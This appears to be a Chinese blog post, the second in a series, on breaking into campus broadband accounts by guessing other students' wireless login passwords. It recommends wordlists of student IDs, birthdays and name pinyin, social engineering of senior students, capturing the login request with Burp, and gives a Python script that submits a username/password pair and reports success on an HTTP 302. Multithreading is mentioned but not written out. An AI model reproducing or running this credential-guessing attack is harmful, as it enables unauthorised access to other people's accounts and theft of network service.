校园宽带破解---解救断网之际(二)

需求:校园宽带破解的速度,以及正确率
分析:
1)先说速度:
第一个验证方式,我前一篇是采用cmd连接宽带,这个有个硬件限制,拨号不能太快和同时拨号,不然会显示解调器错误等,所以根据每个人电脑来,可以设置不同的延时,延时短是不是速度就上去了,但是这个不是最后的办法,前一篇我提到过,无线网页验证,这个不仅没有硬件的限制,同时可以多线程,高并发访问。
2)正确率
这个和你的密码本有关,这个你就要了解常用的密码,以及组合模式,大部分就是学号,生日,123456等弱密码,姓名全拼音,姓名拼音首字母和密码组合等,你可以通过社工方式去了解学长学姐们设置密码的方式,这个能提高不少正确率。
亮剑:

》第一步:找到无线登陆网址
》第二步:
观察界面,有几个输入框,有没有验证码,没有验证码,就简单些,有验证码,也不能说它难!
》第三步:分析post提交数据(因为有隐藏数据),以及提交后Http的状态码(为判断成功或者失败作准备)
我提供几种方案去分析:
1)用神器burp拦截,这里有几个要说明,burp拦截的数据已经urlencode了,所以后面如果要直接用,一定要处理一下,比如把%3A替换成:
2)用火狐F12或者火狐插件(HttpFox )
3)用chrome F12
》第四步:使用python requests 模拟登陆

wifiLogin_cracker.py
#coding=utf-8
import requests


def do_login(uname,upwd):
    # 无线登录网址
    url=""
    try:
        s=requests.session()
        #构造POST数据,通过工具分析的隐藏数据一定要添加,还有注意很长隐藏数据,很可能不一样,可以用比较工具分析
        pdata=dict()
        pdata['username']=uname
        pdata['possword']=upwd
        headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:49.0) Gecko/20100101 Firefox/49.0',
                   'Content-Type': 'application/x-www-form-urlencoded',#这个必须要,就是为了进行url编码,不懂问度娘
                   }
        #提交POST
        resp=s.put(url,pdata,headers=headers)

        #判断是不是已经登录成功
        #这里根据分析直接用状态码就可以
        if resp.status_code==302:
            print 'uname: '+uname+' upwd: '+upwd+': login successs!'
    except Exception as e:
        print "分析下面报错:"
        print e


if __name__=='__main__':
    do_login("2013121545",'123456')

》第五步:多线程,这个只要第四步走通,下面就很简单了,我就不写了

  • 3
    点赞
  • 17
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值